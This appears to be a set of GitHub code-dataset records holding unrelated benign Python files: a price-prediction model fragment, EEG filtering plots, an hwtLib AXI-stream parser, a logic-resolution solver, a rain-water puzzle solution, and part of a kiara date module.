print(X_valid.shape)\n\n #################\n Xb_train, Xb_valid = [x.astype(np.bool).astype(np.float32) for x in [X_train, X_valid]]\n xsb = [Xb_train, Xb_valid]\n xs = [X_train, X_valid]\n y_pred1 = fit_predict(xs, y_train)\n y_pred2 = fit_predict(xs, y_train)\n y_pred1b = fit_predict(xsb, y_train)\n y_pred2b = fit_predict(xsb, y_train)\n\n y_pred = np.mean(np.array([y_pred1, y_pred2, y_pred1b, y_pred2b]), axis=0)\n y_pred = np.expm1(y_scaler.inverse_transform(y_pred.reshape(-1, 1))[:, 0])\n print('Avg Valid RMSLE: {:.4f}'.format(np.sqrt(mean_squared_log_error(valid['price'], y_pred))))\n\n valid = valid.reset_index(drop=True)\n result = pd.concat([valid, pd.DataFrame(y_pred, columns=['pred'])], axis=1)\n result.to_csv(os.path.join(BASE_DIR, 'out/result_avg.csv'))\n\n y_pred1 = np.expm1(y_scaler.inverse_transform(y_pred1.reshape(-1, 1))[:, 0])\n print('Avg Valid RMSLE1: {:.4f}'.format(np.sqrt(mean_squared_log_error(valid['price'], y_pred1))))\n result1 = pd.concat([valid, pd.DataFrame(y_pred1, columns=['pred'])], axis=1)\n result1.to_csv(os.path.join(BASE_DIR, 'out/result_1.csv'))\n\n y_pred1b = np.expm1(y_scaler.inverse_transform(y_pred1b.reshape(-1, 1))[:, 0])\n print('Avg Valid RMSLE1b: {:.4f}'.format(np.sqrt(mean_squared_log_error(valid['price'], y_pred1b))))\n result1b = pd.concat([valid, pd.DataFrame(y_pred1b, columns=['pred'])], axis=1)\n result1b.to_csv(os.path.join(BASE_DIR, 'out/result_1b.csv'))\n\n xs_train=[X_train, X_train]\n ytrain_pred1 = fit_predict(xs_train, y_train)\n ytrain_pred1 = np.expm1(y_scaler.inverse_transform(ytrain_pred1.reshape(-1, 1))[:, 0])\n print('Avg Train RMSLE1: {:.4f}'.format(np.sqrt(mean_squared_log_error(train['price'], ytrain_pred1))))\n result_train1 = pd.concat([train, pd.DataFrame(ytrain_pred1, columns=['pred'])], axis=1)\n result_train1.to_csv(os.path.join(BASE_DIR, 
'out/result_train1.csv'))\n\n#############################\n","repo_name":"glbreeze/mercari-price-suggestion","sub_path":"TFIDF_model.py","file_name":"TFIDF_model.py","file_ext":"py","file_size_in_byte":6452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"27749893145","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\n@author: Nikolas Kyriacou\r\nMSc Project on the Investigation of the SNR in EEG Signals\r\n\"\"\"\r\nfrom IIR2Filter import IIR2Filter # This library is obtained from https://github.com/poganyg/IIR-filter/blob/master/src/IIR2Filter.py\r\nimport numpy as np\r\nimport scipy.signal as signal\r\nimport matplotlib.pyplot as plt\r\n#import scipy.io.wavfile as wavfile\r\nimport math\r\nfrom scipy.interpolate import interp1d\r\nimport scipy.stats as stats\r\n\r\n\r\nfsampl = 1000 # Sampling frequency\r\nt_step = 4000 # time step or segment size in ms \r\nt_start = 4000 # start time of segment in ms\r\nA_gain = 50 # Gain of the EEG Amplifier\r\nmVolts=1000 #1V = 1000mV\r\nmicroV=1000000 #1V = 1000000uV\r\n\r\n\"\"\"\r\nSpecify EEG file name\r\n\"\"\"\r\ndata_in=np.loadtxt('Experiments/Task7.csv')\r\ndata=data_in*microV/A_gain #*mVolts/A_gain\r\ns_size=len(data) # number of signal samples\r\n\r\n\"\"\"\r\nPlot the unfiltered EEG signal and its spectrum\r\n\"\"\"\r\nks = np.arange(s_size)*1000/fsampl #Array for signal x-axis \r\nplt.figure(1)\r\nplt.title('Raw EEG Signal')\r\nplt.xlabel('Time (ms)')\r\nplt.ylabel('Amplitude (μV)')\r\nplt.grid(which='both', axis='both')\r\nplt.plot(ks,data)\r\nplt.show()\r\n\r\n\"\"\"\r\nPlot the spectrum of the unfiltered EEG signal\r\n\"\"\"\r\n\r\nmask2=np.fft.fft(data)\r\nplt.figure(2)\r\nplt.title('Raw EEG Signal Spectrum')\r\nplt.xlabel('Frequency (Hz)')\r\nplt.ylabel('Signal Power')\r\nplt.grid(which='both', axis='both')\r\nkf = np.arange(s_size)*fsampl/s_size #Array for spectrum x-axis \r\nplt.plot(kf,abs(mask2)/s_size) \r\nplt.show() \r\n\r\n'''\r\nFilter the signal with a 50Hz notch filter\r\n'''\r\nf_signal = np.zeros(s_size) #Initialize array to store the filtered samples\r\nFilterMains = IIR2Filter(10,[45,55],'bandstop',design='cheby1',rp=2,fs = fsampl) \r\nfor i in range(len(data)):\r\n f_signal[i] = FilterMains.filter(data[i])\r\n\r\n\"\"\"\r\nPlot the 50Hz filtered EEG signal and its spectrum\r\n\"\"\"\r\nplt.figure(3)\r\nplt.title('50Hz Filtered EEG Signal')\r\nplt.xlabel('Time (ms)')\r\nplt.ylabel('Amplitude (μV)')\r\nplt.grid(which='both', axis='both')\r\nplt.plot(ks,f_signal)\r\nplt.show() \r\nmask2=np.fft.fft(f_signal)\r\nplt.figure(4)\r\nplt.title('50Hz Filtered EEG Signal Spectrum')\r\nplt.xlabel('Frequency (Hz)')\r\nplt.ylabel('Signal Power')\r\nplt.grid(which='both', axis='both')\r\nkf = np.arange(s_size)*fsampl/s_size\r\nplt.plot(kf,abs(mask2)/s_size) \r\nplt.show() \r\n\"\"\"\r\nPlot part of the filtered EEG signal and its spectrum\r\n\"\"\"\r\npsize = int(t_step*fsampl/1000) #/fsampl # size of partial buffer\r\npstart = int(t_start*fsampl/1000) #/fsampl # beginning of partial buffer\r\nkp = np.arange(t_start,t_start+t_step,1000/fsampl) #pstart\r\nseg=np.zeros(psize)\r\nseg[0:psize]=f_signal[pstart:psize+pstart]\r\nplt.figure(5)\r\nplt.title('50Hz Filtered Partial EEG Signal (from ' + str(t_start)+'ms to '+str(t_start+t_step) +'ms)')\r\nplt.xlabel('Time (ms)')\r\nplt.ylabel('Amplitude (μV)')\r\nplt.grid(which='both', axis='both')\r\nplt.plot(kp,seg)\r\nplt.show() \r\n\r\nkfp = 
np.arange(0,fsampl,fsampl/psize)\r\nmask2=np.fft.fft(seg)\r\nplt.figure(6)\r\nplt.title('50Hz Filtered Partial EEG Signal Spectrum (from ' + str(t_start)+'ms to '+str(t_start+t_step) +'ms)')\r\nplt.xlabel('Frequency (Hz)')\r\nplt.ylabel('Signal Power')\r\nplt.grid(which='both', axis='both')\r\nmask2[0:int(5*psize/fsampl)]=0 #Set 0Hz and 1Hz to 0\r\nplot_fmax=40 #maximum plot frequency\r\n#ppsize=psize-300\r\nplt.plot(kfp[0:int(plot_fmax*psize/fsampl)],abs((mask2[0:int(plot_fmax*psize/fsampl)]/psize))) #display up to 40Hz\r\nplt.show()\r\n\r\n\"\"\"\r\nBandpass filter the EEG signal 8Hz to 12Hz\r\n\"\"\"\r\nf_signalbp = np.zeros(s_size) #Initialize array to store the filtered samples\r\n#FilterAlpha = IIR2Filter(10,[7,13],'bandpass',design='cheby1',rp=2,fs = fsampl) \r\nFilterAlpha = IIR2Filter(10,[8,12],'bandpass',design='butter',rp=2,fs = fsampl) \r\nfor i in range(len(data)):\r\n f_signalbp[i] = FilterAlpha.filter(f_signal[i])\r\n\r\n\r\n\"\"\"\r\nPlot the Bandpass filtered EEG signal and its spectrum\r\n\"\"\"\r\nplt.figure(7)\r\nplt.title('Bandpass Filtered EEG Signal')\r\nplt.xlabel('Time (ms)')\r\nplt.ylabel('Amplitude (μV)')\r\nplt.grid(which='both', axis='both')\r\nplt.plot(ks,f_signalbp)\r\nplt.show() \r\nmask2=np.fft.fft(f_signalbp)\r\nplt.figure(8)\r\nplt.title('Bandpass Filtered EEG Signal Spectrum')\r\nplt.xlabel('Frequency (Hz)')\r\nplt.ylabel('Signal Power')\r\nplt.grid(which='both', axis='both')\r\nkf = np.arange(s_size)*fsampl/s_size\r\nplt.plot(kf,abs(mask2)) \r\nplt.show() \r\n\r\n\"\"\"\r\nPlot a segment of the bandpass filtered EEG signal and its spectrum\r\nTo set the plot range change t_step and t_start at the beggining of the program\r\n\"\"\"\r\n\r\npsize = int(t_step*fsampl/1000) #/fsampl # size of partial buffer\r\npstart = int(t_start*fsampl/1000) #/fsampl # begining of partial buffer\r\nkp = np.arange(t_start,t_start+t_step,1000/fsampl) #pstart\r\nbpseg=np.zeros(psize)\r\nbpseg[0:psize]=f_signalbp[pstart:psize+pstart]\r\nplt.figure(9)\r\nplt.title('Bandpass Filtered Partial EEG Signal (from ' + str(t_start)+'ms to '+str(t_start+t_step) +'ms)')\r\nplt.xlabel('Time (ms)')\r\nplt.ylabel('Amplitude (μV)')\r\nplt.grid(which='both', axis='both')\r\nplt.plot(kp,bpseg)\r\nplt.show() \r\n\r\nkfp = np.arange(0,fsampl,fsampl/psize)\r\nmask3=np.fft.fft(bpseg)\r\nplt.figure(10)\r\nplt.title('Bandpass Filtered Partial EEG Signal Spectrum (from ' + str(t_start)+'ms to '+str(t_start+t_step) +'ms)')\r\nplt.xlabel('Frequency (Hz)')\r\nplt.ylabel('Signal Power')\r\nplt.grid(which='both', axis='both')\r\nmask3[0:int(5*psize/fsampl)]=0 #Set 0Hz and 1Hz to 0\r\nplot_fmax=40 #maximum plot frequency\r\nplt.plot(kfp[0:int(plot_fmax*psize/fsampl)],abs((mask3[0:int(plot_fmax*psize/fsampl)]/psize))) #display up to 40Hz\r\nplt.show()\r\n\r\n\r\n","repo_name":"nikolaskyr/EEG-Signals-SNR-Calculation","sub_path":"EEG_Plots.py","file_name":"EEG_Plots.py","file_ext":"py","file_size_in_byte":5600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"17409132335","text":"from typing import Union, Optional, Tuple, List\n\nfrom hwt.code import If, Switch, Concat\nfrom hwt.hdl.frameTmplUtils import ChoicesOfFrameParts\nfrom hwt.hdl.transPart import TransPart\nfrom hwt.hdl.types.defs import BIT\nfrom hwt.hdl.types.stream import HStream\nfrom hwt.hdl.types.struct import HStructField\nfrom hwt.interfaces.structIntf import StructIntf\nfrom hwt.interfaces.unionIntf import UnionSource, UnionSink\nfrom hwt.synthesizer.byteOrder import 
reverseByteOrder\nfrom hwt.synthesizer.rtlLevel.rtlSignal import RtlSignal\nfrom hwt.synthesizer.unit import Unit\nfrom hwtLib.amba.axis import AxiStream\nfrom hwtLib.amba.axis_comp.frame_parser.out_containers import ListOfOutNodeInfos, \\\n ExclusieveListOfHsNodes, InNodeInfo, InNodeReadOnlyInfo, OutStreamNodeGroup, \\\n OutStreamNodeInfo, OutNodeInfo\nfrom hwtLib.handshaked.builder import HsBuilder\nfrom pyMathBitPrecise.bit_utils import mask\n\n\ndef get_byte_order_modifier(axis: AxiStream):\n if axis.IS_BIGENDIAN:\n return reverseByteOrder\n else:\n\n def byteOrderCare(sig):\n return sig\n\n return byteOrderCare\n\n\nclass AxiS_frameParserFieldConnector():\n\n def __init__(self, parent: Unit, dataIn: AxiStream, dataOut: Union[StructIntf, UnionSource]):\n self.parent = parent\n self.dataIn = dataIn\n self.dataOut = dataOut\n self.byteOrderCare = get_byte_order_modifier(dataIn)\n self._tmpRegsForSelect = {}\n # TransTmpl: List[RtlSignal]\n self._signalsOfParts = {}\n # AxiStream: OutStreamNodeInfo\n self._streamNodes = {}\n\n def getInDataSignal(self, transPart: TransPart):\n busDataSignal = self.dataIn.data\n high, low = transPart.getBusWordBitRange()\n return busDataSignal[high:low]\n\n def choiceIsSelected(self,\n interfaceOfChoice: Union[UnionSource, UnionSink]):\n \"\"\"\n Check if union member is selected by _select interface\n in union interface\n \"\"\"\n parent = interfaceOfChoice._parent\n r = self._tmpRegsForSelect[parent]\n i = parent._interfaces.index(interfaceOfChoice)\n return i, r.data._eq(i), r.vld\n\n def connectParts(self,\n allOutNodes: ListOfOutNodeInfos,\n words: Tuple[int, List[Union[TransPart, ChoicesOfFrameParts]], bool],\n wordIndex: Optional[RtlSignal]):\n \"\"\"\n Create main datamux from dataIn to dataOut\n \"\"\"\n for currentWordIndex, transParts, _ in words:\n # each word index is used and there may be TransParts which are\n # representation of padding\n outNondes = ListOfOutNodeInfos()\n for part in transParts:\n self.connectPart(outNondes, part, BIT.from_py(1), BIT.from_py(1),\n wordIndex, currentWordIndex)\n\n allOutNodes.addWord(currentWordIndex, outNondes)\n\n def connectChoicesOfFrameParts(\n self,\n hsNondes: ListOfOutNodeInfos,\n part: ChoicesOfFrameParts,\n en: Union[RtlSignal, bool],\n exclusiveEn: Optional[RtlSignal],\n wordIndex: Optional[RtlSignal],\n currentWordIndex: int):\n tToIntf = self.dataOut._fieldsToInterfaces\n parentIntf = tToIntf[part.origin.parent.getFieldPath()]\n try:\n sel = self._tmpRegsForSelect[parentIntf]\n except KeyError:\n sel = HsBuilder(self.parent, parentIntf._select).buff().end\n self._tmpRegsForSelect[parentIntf] = sel\n unionGroup = ExclusieveListOfHsNodes(sel)\n\n # for unions\n for choice in part:\n # connect data signals of choices and collect info about\n # streams\n intfOfChoice = tToIntf[choice.tmpl.getFieldPath()]\n selIndex, isSelected, isSelectValid = self.choiceIsSelected(\n intfOfChoice)\n _exclusiveEn = isSelectValid & isSelected & exclusiveEn\n\n unionMemberPart = ListOfOutNodeInfos()\n for p in choice:\n self.connectPart(unionMemberPart, p, en, _exclusiveEn,\n wordIndex, currentWordIndex)\n unionGroup.append(selIndex, unionMemberPart)\n hsNondes.append(unionGroup)\n\n if wordIndex is not None:\n en = en & wordIndex._eq(currentWordIndex)\n if part.isLastPart():\n # synchronization of reading from _select register for unions\n selNode = InNodeInfo(sel, en)\n else:\n selNode = InNodeReadOnlyInfo(sel, en)\n hsNondes.append(selNode)\n\n def connectStreamOfFrameParts(\n self,\n hsNondes: 
ListOfOutNodeInfos,\n part: Union[TransPart, ChoicesOfFrameParts],\n en: Union[RtlSignal, bool],\n exclusiveEn: Optional[RtlSignal],\n wordIndex: Optional[RtlSignal],\n currentWordIndex: int):\n orig = part.tmpl.origin[-1]\n # use tmpl.parent because part is actually a chunk of data\n # in the stream\n path_to_stream_port = part.tmpl.parent.getFieldPath()\n dout = self.dataOut._fieldsToInterfaces[path_to_stream_port]\n if isinstance(orig, HStructField):\n orig = orig.dtype\n assert isinstance(orig, HStream), orig\n\n # if not part.isLastPart():\n # raise NotImplementedError()\n\n if not len(orig.start_offsets) == 1:\n raise NotImplementedError()\n\n din = self.dataIn\n is_first_part_in_stream = part.tmpl.parent.bitAddr == part.startOfPart\n if is_first_part_in_stream:\n frame_range = part.tmpl.parent.bitAddr, part.tmpl.parent.bitAddrEnd\n DW = din.DATA_WIDTH\n start_offset = frame_range[0] % DW\n end_rem = frame_range[1] % DW\n if orig.start_offsets != (0,):\n raise NotImplementedError()\n\n # this is a first part of stream\n # now connect all data for each part\n non_data_signals = [din.valid, din.ready, din.last]\n if start_offset == 0 and end_rem == 0:\n pass\n else:\n if dout.USE_STRB:\n non_data_signals.append(din.strb)\n if dout.USE_KEEP:\n non_data_signals.append(din.keep)\n\n assert start_offset % 8 == 0, start_offset\n assert end_rem % 8 == 0, end_rem\n first_word_i = frame_range[0] // DW\n last_word_i = (frame_range[1] - 1) // DW\n first_word_mask = mask((DW - start_offset) // 8) << start_offset // 8\n body_word_mask = mask(DW // 8)\n\n def set_mask(m):\n res = []\n if dout.USE_STRB:\n res.append(dout.strb(m))\n if dout.USE_KEEP:\n res.append(dout.keep(m))\n return res\n\n if end_rem == 0:\n last_word_mask = body_word_mask\n else:\n last_word_mask = mask(end_rem // 8)\n if first_word_i == last_word_i:\n # only single word, mask is constant\n m = first_word_mask & last_word_mask\n set_mask(m)\n elif first_word_i == last_word_i + 1:\n # only two words, mask is differnt between word 0 and 1\n raise NotImplementedError()\n else:\n # 2+ words, first and body or last and body may be same\n if first_word_mask == body_word_mask:\n # last is only word with a special mask\n If(wordIndex._eq(last_word_i),\n *set_mask(last_word_mask)\n ).Else(\n *set_mask(body_word_mask)\n )\n elif last_word_mask == body_word_mask:\n # first is only word with special mask\n If(wordIndex._eq(first_word_i),\n *set_mask(first_word_mask)\n ).Else(\n *set_mask(body_word_mask)\n )\n else:\n # first, last, body word have all unique masks\n Switch(wordIndex)\\\n .Case(first_word_i, set_mask(first_word_mask))\\\n .Case(last_word_i, set_mask(last_word_mask))\\\n .Default(set_mask(body_word_mask))\n\n dout(din, exclude=non_data_signals)\n is_last_part_in_stream = part.tmpl.parent.bitAddrEnd == part.endOfPart\n if is_last_part_in_stream:\n if wordIndex is None:\n last = 1\n else:\n last = wordIndex._eq(currentWordIndex)\n dout.last(last)\n\n if is_first_part_in_stream or part.startOfPart % din.DATA_WIDTH == 0:\n # first part in current word\n streamGroup = self._streamNodes.setdefault(dout, OutStreamNodeGroup(wordIndex, currentWordIndex))\n streamGroup.word_range_max = currentWordIndex\n on = OutStreamNodeInfo(self.parent, dout, en, exclusiveEn, streamGroup)\n hsNondes.append(on)\n\n def connectPart(self,\n hsNondes: ListOfOutNodeInfos,\n part: Union[TransPart, ChoicesOfFrameParts],\n en: Union[RtlSignal, bool],\n exclusiveEn: Union[RtlSignal, bool],\n wordIndex: Optional[RtlSignal],\n currentWordIndex: int):\n \"\"\"\n 
Create datamux for a single output word in main fsm\n and colect metainformations for handshake logic\n and strb/keep\n\n :param hsNondes: list of nodes of handshaked logic\n \"\"\"\n if isinstance(part, ChoicesOfFrameParts):\n # connect union field\n return self.connectChoicesOfFrameParts(\n hsNondes, part, en, exclusiveEn, wordIndex, currentWordIndex)\n # elif isinstance(part, StreamOfFrameParts):\n # return self.connectStreamOfFrameParts(\n # hsNondes, part, en, exclusiveEn, wordIndex)\n elif part.isPadding:\n return\n\n fieldInfo = part.tmpl.origin[-1]\n if isinstance(fieldInfo, HStream) or (\n isinstance(fieldInfo, HStructField) and\n isinstance(fieldInfo.dtype, HStream)):\n return self.connectStreamOfFrameParts(\n hsNondes, part, en, exclusiveEn, wordIndex, currentWordIndex)\n\n # connect regular scalar field\n fPartSig = self.getInDataSignal(part)\n assert isinstance(fieldInfo, HStructField), fieldInfo\n\n try:\n signalsOfParts = self._signalsOfParts[part.tmpl]\n except KeyError:\n signalsOfParts = []\n self._signalsOfParts[part.tmpl] = signalsOfParts\n\n if wordIndex is not None:\n en = en & wordIndex._eq(currentWordIndex)\n\n if part.isLastPart():\n # connect all parts in this group to output stream\n signalsOfParts.append(fPartSig)\n tToIntf = self.dataOut._fieldsToInterfaces\n intf = tToIntf[part.tmpl.getFieldPath()]\n intf.data(self.byteOrderCare(\n Concat(\n *reversed(signalsOfParts)\n ))\n )\n on = OutNodeInfo(self.parent, intf, en, exclusiveEn)\n hsNondes.append(on)\n else:\n # part is not in same word as last part, we have to store it's value\n # to register until the last part arrive\n fPartReg = self.parent._reg(f\"{fieldInfo.name:s}_part_{len(signalsOfParts):d}\",\n fPartSig._dtype)\n dataVld = self.dataIn.valid & en & exclusiveEn\n If(dataVld,\n fPartReg(fPartSig)\n )\n signalsOfParts.append(fPartReg)\n","repo_name":"Nic30/hwtLib","sub_path":"hwtLib/amba/axis_comp/frame_parser/field_connector.py","file_name":"field_connector.py","file_ext":"py","file_size_in_byte":12034,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"48"} +{"seq_id":"5420725074","text":"import copy\nimport time\n\nnumOfQuery = 0\nnumOfSentences = 0\nqueries = []\nstartTime = 0\n\n\nclass KB:\n def __init__(self):\n self.predicates = set()\n self.neg = {}\n self.pos = {}\n self.checked = {}\n self.sentences = []\n\n def add(self, predicate, index):\n if '~' not in predicate[0]:\n if predicate[0] not in self.predicates:\n self.predicates.add(predicate[0])\n self.pos[predicate[0]] = []\n self.pos[predicate[0]].append(index)\n else:\n if predicate[0] not in self.predicates:\n self.predicates.add(predicate[0])\n self.neg[predicate[0]] = []\n self.neg[predicate[0]].append(index)\n\n def addSentences(self, sentence):\n self.sentences.append(sentence)\n\n\ndef negative(sentence):\n if sentence[0] == '~':\n sentence = sentence[1:]\n else:\n sentence = '~' + sentence\n return sentence\n\n\ndef getPredicate(sentence):\n predicate = []\n action = sentence.split('(')\n if ',' in action[1]:\n variables = action[1].split(')')[0].split(',')\n predicate.append(action[0])\n predicate.extend(variables)\n else:\n variables = action[1].split(')')[0]\n predicate.append(action[0])\n predicate.append(variables)\n\n return predicate\n\n\ndef isVariable(variable):\n if variable.islower():\n return True\n\n\ndef standard(predicate, index):\n for i in range(1, len(predicate)):\n if isVariable(predicate[i]):\n predicate[i] = predicate[i] + str(index)\n return predicate[0] + '(' + 
','.join(predicate[1:]) + ')'\n\n\ndef transfer(sentence, index, knowledgeBase):\n if '=>' in sentence:\n require, conclusion = sentence.split('=>')\n # remove the space\n require = require.strip()\n conclusion = conclusion.strip()\n if '&' in require:\n soloParts = require.split('&')\n for i in range(0, len(soloParts)):\n soloParts[i] = soloParts[i].strip()\n soloParts[i] = negative(soloParts[i])\n predicate = getPredicate(soloParts[i])\n knowledgeBase.add(predicate, index)\n soloParts[i] = standard(predicate, index)\n result = ' | '.join(soloParts)\n else:\n require = negative(require)\n predicate = getPredicate(require)\n knowledgeBase.add(predicate, index)\n result = standard(predicate, index)\n predicate = getPredicate(conclusion)\n knowledgeBase.add(predicate, index)\n conclusion = standard(predicate, index)\n result = result + ' | ' + conclusion\n knowledgeBase.addSentences(result)\n else:\n predicate = getPredicate(sentence)\n knowledgeBase.add(predicate, index)\n sentence = standard(predicate, index)\n knowledgeBase.addSentences(sentence)\n\n\ndef firstResolve(predicates, KB):\n actionNeg = negative(predicates[0])\n if '~' in predicates[0] and actionNeg in KB.pos:\n return KB.pos[actionNeg]\n elif '~' not in predicates[0] and actionNeg in KB.neg:\n return KB.neg[actionNeg]\n\n\ndef unify(KBpre, Querypre):\n matchDict = {}\n KBpredicates = getPredicate(KBpre)\n Querypredicates = getPredicate(Querypre)\n numVKB = len(KBpredicates)\n numVQ = len(Querypredicates)\n if numVKB != numVQ:\n return matchDict\n for i in range(1, numVKB):\n if isVariable(KBpredicates[i]) and isVariable(Querypredicates[i]):\n if (KBpredicates[i] not in matchDict) and (Querypredicates[i] not in matchDict):\n matchDict[KBpredicates[i]] = Querypredicates[i]\n elif isVariable(KBpredicates[i]) and not isVariable(Querypredicates[i]):\n if KBpredicates[i] not in matchDict:\n matchDict[KBpredicates[i]] = Querypredicates[i]\n elif matchDict[KBpredicates[i]] != Querypredicates[i]:\n return {}\n elif (not isVariable(KBpredicates[i])) and isVariable(Querypredicates[i]):\n if Querypredicates[i] not in matchDict:\n matchDict[Querypredicates[i]] = KBpredicates[i]\n elif matchDict[Querypredicates[i]] != KBpredicates[i]:\n return {}\n else:\n if KBpredicates[i] == Querypredicates[i]:\n matchDict[KBpredicates[i]] = Querypredicates[i]\n else:\n return {}\n return matchDict\n\n\ndef getSentence(predicate, possibleValue, dictionary):\n newSentence = ''\n predicate.pop(possibleValue)\n for i in range(0, len(predicate)):\n pre = getPredicate(predicate[i])\n for j in range(1, len(pre)):\n if pre[j] in dictionary:\n pre[j] = dictionary[pre[j]]\n newSentence = newSentence + pre[0] + '(' + ','.join(pre[1:]) + ')' + ' | '\n return newSentence\n\n\ndef resolution(knowledgeBase, query, depth):\n if depth >= 150 or time.time() - startTime > 10:\n return False\n # if depth > 120:\n # return False\n actionIndex = {}\n queryPart = query.split('|')\n for i in range(0, len(queryPart)):\n queryPart[i] = queryPart[i].strip()\n predicate = getPredicate(queryPart[i])\n tempValue = firstResolve(predicate, knowledgeBase)\n if tempValue:\n actionIndex[predicate[0]] = tempValue\n if actionIndex:\n for action in actionIndex.keys():\n for index in actionIndex[action]:\n findFlag = False\n KBSentence = knowledgeBase.sentences[index]\n negAction = negative(action)\n preKBSentence = KBSentence.split('|')\n preQuery = query.split('|')\n KBpossible = []\n Querypossible = []\n # remove the space\n for i in range(0, len(preKBSentence)):\n preKBSentence[i] = 
preKBSentence[i].strip()\n predicateKB = getPredicate(preKBSentence[i])\n if predicateKB[0] == negAction:\n KBpossible.append(i)\n for i in range(0, len(preQuery)):\n preQuery[i] = preQuery[i].strip()\n predicateQuery = getPredicate(preQuery[i])\n if predicateQuery[0] == action:\n Querypossible.append(i)\n for i in range(0, len(KBpossible)):\n for j in range(0, len(Querypossible)):\n matchDict = unify(preKBSentence[KBpossible[i]], preQuery[Querypossible[j]])\n if matchDict:\n KBindex = i\n Qindex = j\n findFlag = True\n break\n if not findFlag:\n resSentence = \"NotFind\"\n else:\n tempSentence = getSentence(preKBSentence, KBpossible[KBindex], matchDict)\n tempSentence += getSentence(preQuery, Querypossible[Qindex], matchDict)\n if tempSentence == '':\n return True\n else:\n res = []\n tempSentence = tempSentence[:-3]\n resPredicate = tempSentence.split('|')\n for i in range(0, len(resPredicate)):\n resPredicate[i] = resPredicate[i].strip()\n resPredicate = set(resPredicate)\n for element in resPredicate:\n if negative(element) not in resPredicate:\n res.append(element)\n\n if not res:\n resSentence = \"NotFind\"\n else:\n resSentence = ' | '.join(sorted(res))\n print(resSentence)\n if resSentence in knowledgeBase.checked and knowledgeBase.checked[resSentence] >= 20:\n continue\n if resSentence == \"NotFind\":\n continue\n result = resolution(knowledgeBase, resSentence, depth + 1)\n if result:\n return True\n if resSentence not in knowledgeBase.checked:\n knowledgeBase.checked[resSentence] = 0\n knowledgeBase.checked[resSentence] += 1\n return False\n\n\nif __name__ == \"__main__\":\n knowledgeBase = KB()\n inputFile = open(\"input.txt\")\n fileData = inputFile.readlines()\n numOfQuery = int(fileData.pop(0).rstrip())\n for i in range(0, numOfQuery):\n queries.append(fileData.pop(0).rstrip())\n numOfSentences = int(fileData.pop(0).rstrip())\n for i in range(0, numOfSentences):\n sentence = fileData.pop(0).rstrip()\n transfer(sentence, i, knowledgeBase)\n # print(knowledgeBase.sentences)\n\n output = open(\"output.txt\", \"w\")\n for i in range(0, numOfQuery):\n copyKB = copy.deepcopy(knowledgeBase)\n queries[i] = negative(queries[i])\n copyKB.addSentences(queries[i])\n predicate = getPredicate(queries[i])\n copyKB.add(predicate, len(copyKB.sentences) - 1)\n startTime = time.time()\n result = resolution(copyKB, queries[i], 0)\n if result:\n print(result)\n if i != numOfQuery - 1:\n output.write(\"TRUE\\n\")\n else:\n output.write('TRUE')\n else:\n if i != numOfQuery - 1:\n output.write(\"FALSE\\n\")\n else:\n output.write('FALSE')\n","repo_name":"Lisha-Xu/CSCI561-AI","sub_path":"HW3/homework.py","file_name":"homework.py","file_ext":"py","file_size_in_byte":9578,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"10721959121","text":"def answer(heights):\n N = len(heights)\n # Scan for left highest\n lhigh = -1\n lindex = -1\n larray = [0] * N\n for i in range(N):\n vi = heights[i]\n if vi < lhigh:\n larray[i] = lindex\n else:\n larray[i] = i\n lhigh = vi\n lindex = i\n # scan for right highest\n rhigh = -1\n rindex = -1\n rarray = [0] * N\n for i in range(N-1, -1, -1):\n vi = heights[i]\n if vi < rhigh:\n rarray[i] = rindex\n else:\n rarray[i] = i\n rhigh = vi\n rindex = i\n\n # print (larray)\n # print ([heights[i] for i in larray])\n # print (rarray)\n # print ([heights[i] for i in rarray])\n\n # build total height\n total = 0\n for i in range(N):\n lindex = larray[i]\n rindex = rarray[i]\n if i - lindex > 0 and rindex - i > 0:\n v 
= min(heights[lindex], heights[rindex]) - heights[i]\n total += v\n # print (\"Height of cell {} is {}\".format(i, v))\n # print(\"Total is {}\".format(total))\n return total\n\n\nheights = [1, 4, 2, 5, 1, 2, 3]\nheights = [1, 2, 3, 2, 1]\nanswer(heights)\n# larray and rarray printed for heights = [1, 4, 2, 5, 1, 2, 3]:\n# [0, 1, 1, 3, 3, 3, 3]\n# [3, 3, 3, 3, 6, 6, 6]\n","repo_name":"iveney/google-foobar","sub_path":"when_it_rains_it_pours.py","file_name":"when_it_rains_it_pours.py","file_ext":"py","file_size_in_byte":1208,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"6809090499","text":"# -*- coding: utf-8 -*-\n\n\"\"\"A collection of date related modules.\n\nMost of those are very bare-bones, not really dealing with more advanced (but very important) concepts like timezones\nand resolution yet.\n\"\"\"\nimport datetime\nimport re\nimport typing\n\nfrom kiara import KiaraModule\nfrom kiara.data import ValueSet\nfrom kiara.data.values import ValueSchema\n\n# flake8: noqa\n\n\nclass ExtractDateModule(KiaraModule):\n \"\"\"Extract a date object from a string.\n\n This module is not really smart yet; currently it uses the following regex to extract a date (which might fail in a lot of cases):\n\n r\"_(\\d{4}-\\d{2}-\\d{2})_\"\n\n \"\"\"\n\n _module_type_name = \"extract_from_string\"\n\n def create_input_schema(\n self,\n ) -> typing.Mapping[\n str, typing.Union[ValueSchema, typing.Mapping[str, typing.Any]]\n ]:\n\n return {\"text\": {\"type\": \"string\", \"doc\": \"The input string.\"}}\n\n def create_output_schema(\n self,\n ) -> typing.Mapping[\n str, typing.Union[ValueSchema, typing.Mapping[str, typing.Any]]\n ]:\n return {\n \"date\": {\"type\": \"date\", \"doc\": \"The date extracted from the input string.\"}\n }\n\n def process(self, inputs: ValueSet, outputs: ValueSet) -> None:\n\n from dateutil import parser\n\n text = inputs.get_value_data(\"text\")\n date_match = re.findall(r\"_(\\d{4}-\\d{2}-\\d{2})_\", text)\n assert date_match\n d_obj = parser.parse(date_match[0]) # type: ignore\n\n outputs.set_value(\"date\", d_obj)\n\n\nclass DateRangeCheckModule(KiaraModule):\n \"\"\"Check whether a date falls within a specified date range.\n\n If neither of the inputs 'earliest' or 'latest' is set, this module will always return 'True'.\n\n Return ``True`` if that's the case, otherwise ``False``.\n \"\"\"\n\n _module_type_name = \"range_check\"\n\n def create_input_schema(\n self,\n ) -> typing.Mapping[\n str, typing.Union[ValueSchema, 